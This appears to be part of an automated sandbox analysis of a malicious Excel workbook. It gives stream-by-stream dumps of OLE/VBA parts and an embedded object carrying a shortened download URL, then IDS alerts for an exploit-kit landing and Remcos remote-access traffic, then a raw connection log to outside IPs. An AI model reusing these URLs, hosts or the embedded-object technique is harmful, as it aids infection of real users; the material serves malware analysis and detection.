                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ca 52 48 99 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet1"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                              VBA File Name:Sheet2.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R b . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ca 52 62 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet2"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                              VBA File Name:Sheet3.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R 8 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ca 52 38 b1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet3"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                              VBA File Name:ThisWorkbook.cls
                                                              Stream Size:985
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ca 52 d7 82 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "ThisWorkbook"
                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:\x1CompObj
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:114
                                                              Entropy:4.25248375192737
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:244
                                                              Entropy:2.889430592781307
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:200
                                                              Entropy:3.282068105701866
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . i . . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                              General
                                                              Stream Path:MBD0045E998/\x1CompObj
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:99
                                                              Entropy:3.631242196770981
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                              General
                                                              Stream Path:MBD0045E998/Package
                                                              CLSID:
                                                              File Type:Microsoft Excel 2007+
                                                              Stream Size:19363
                                                              Entropy:7.65458028132816
                                                              Base64 Encoded:True
                                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              General
                                                              Stream Path:MBD0045E999/\x1Ole
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:312
                                                              Entropy:6.0028626293896075
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . # J . . + u . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . 3 . 8 . . . f . r . / . G . Q . 1 . o . B . m . . . J 8 E " C k S B 2 j ` . p ( . L E w & g _ J ( n . i . . . , ! p . n g . h ` . W . ] . V . 4 u . . 5 . . A : \\ | F H w . . _ . o g . . . . . . . . . . . . . . . . " . . . j . K . m . y . 1 . j . Z . O . o . h . o . r . j . p . e . 3 . . . . M d = 9 N . 2 m F = B < . . . n
                                                              Data Raw:01 00 00 02 c9 23 ac 4a 07 1b 2b 75 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b b2 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 33 00 38 00 2e 00 66 00 72 00 2f 00 47 00 51 00 31 00 6f 00 42 00 6d 00 00 00 4a d0 38 fa 45 f2 94 f8 e7 b4 22 43 6b 85 53 42 8f 94 c3 32 d6 fb 6a 60 c6 0b ea 70 28 8c ca 99 4c f3 ae e6
                                                              General
                                                              Stream Path:Workbook
                                                              CLSID:
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Stream Size:530703
                                                              Entropy:7.999244781002323
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . A ` . . , 5 . . ` r . . u + . ^ . V I . . 9 W . J [ G v . v h c . . . . . . . { . . . \\ . p . n . v O i . H $ ] . K $ & Q d r . 5 ( . * ` . G . . % h _ . d Z . ( . . f ` y . . _ . . 4 W . . . . . ! z % P . . p . n , o j B . . . . a . . . s . . . = . . . w @ . . . ' P E . 8 . S . . . N . . . . . . . . . j . . . . 7 . . . . . / . . . . = . . . ) : l ' f a . : w @ . . . 8 . . . . . " . . . . . . . . . . . . . . . 4 1 . . . ? D D . . " . . G . . . b ' 1
                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 07 41 60 12 14 2c 35 0d 2e 60 72 0e c1 d8 df cd a8 94 bf 75 b4 2b 14 5e d9 d2 90 81 56 49 96 12 04 39 57 02 4a 96 5b 20 47 76 81 13 76 68 e6 63 e1 00 02 00 b0 04 c1 00 02 00 b2 7b e2 00 00 00 5c 00 70 00 6e 0c d7 76 d1 4f 69 e7 92 b7 48 e4 24 c7 5d 1c 4b 24 26 51 af 88 64 87 72 f4 cc a9 b2 35
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                              CLSID:
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Stream Size:527
                                                              Entropy:5.249603039458245
                                                              Base64 Encoded:True
                                                              Data ASCII:I D = " { 6 F 8 1 9 9 3 2 - 3 2 8 A - 4 3 B 9 - 8 2 B 3 - 9 A F 7 F D 4 8 1 D 6 2 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 E 2 7 6 5 2 7 A 5 2 7 A 5
                                                              Data Raw:49 44 3d 22 7b 36 46 38 31 39 39 33 32 2d 33 32 38 41 2d 34 33 42 39 2d 38 32 42 33 2d 39 41 46 37 46 44 34 38 31 44 36 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:104
                                                              Entropy:3.0488640812019017
                                                              Base64 Encoded:False
                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:2644
                                                              Entropy:3.992287719722412
                                                              Base64 Encoded:False
                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:553
                                                              Entropy:6.368329529937255
                                                              Base64 Encoded:True
                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 96 c1 df 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                              2024-08-28T14:00:50.729091+0200TCP2020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M118049176137.184.234.91192.168.2.22
                                                              2024-08-28T14:00:50.729091+0200TCP2020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M118049176137.184.234.91192.168.2.22
                                                              2024-08-28T14:00:55.204396+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34917980192.168.2.22178.237.33.50
                                                              2024-08-28T14:01:03.474225+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1491788243192.168.2.2245.90.89.98
                                                              2024-08-28T14:00:52.184273+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1491778243192.168.2.2245.90.89.98
                                                              2024-08-28T14:00:49.624657+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image144349175207.241.232.154192.168.2.22
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 28, 2024 14:00:22.524965048 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:22.525022030 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:22.525180101 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:22.532253027 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:22.532267094 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.189903021 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.189991951 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.195198059 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.195204973 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.195509911 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.195554972 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.267172098 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.308490992 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.492397070 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.492475033 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.492516041 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.492516994 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.493580103 CEST49165443192.168.2.2245.83.105.92
                                                              Aug 28, 2024 14:00:23.493602037 CEST4434916545.83.105.92192.168.2.22
                                                              Aug 28, 2024 14:00:23.510832071 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:23.515675068 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:23.515750885 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:23.515810013 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:23.520543098 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.120975018 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121001959 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121014118 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121032000 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121045113 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121057034 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121068954 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121079922 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121094942 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121108055 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.121253967 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.126106024 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.126161098 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.126183033 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.126200914 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.127805948 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220654964 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220688105 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220699072 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220712900 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220733881 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220762014 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220869064 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220904112 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220920086 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220932961 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220956087 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220971107 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.220972061 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.220983028 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.221003056 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.221015930 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.221755981 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.221767902 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.221779108 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.221796036 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.221808910 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.222067118 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222116947 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222121954 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.222130060 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222153902 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.222170115 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.222172022 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222183943 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222213984 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.222943068 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222954035 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222965002 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.222985983 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.223000050 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.223007917 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.223025084 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.223057032 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.225577116 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.225624084 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.261986017 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.262020111 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.262224913 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.308362961 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308387041 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308407068 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308418989 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308430910 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308443069 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308454037 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308465958 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308466911 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.308478117 CEST8049166137.184.234.91192.168.2.22
                                                              Aug 28, 2024 14:00:24.308628082 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.308628082 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.308628082 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.308628082 CEST4916680192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:00:24.581728935 CEST4916680192.168.2.22137.184.234.91
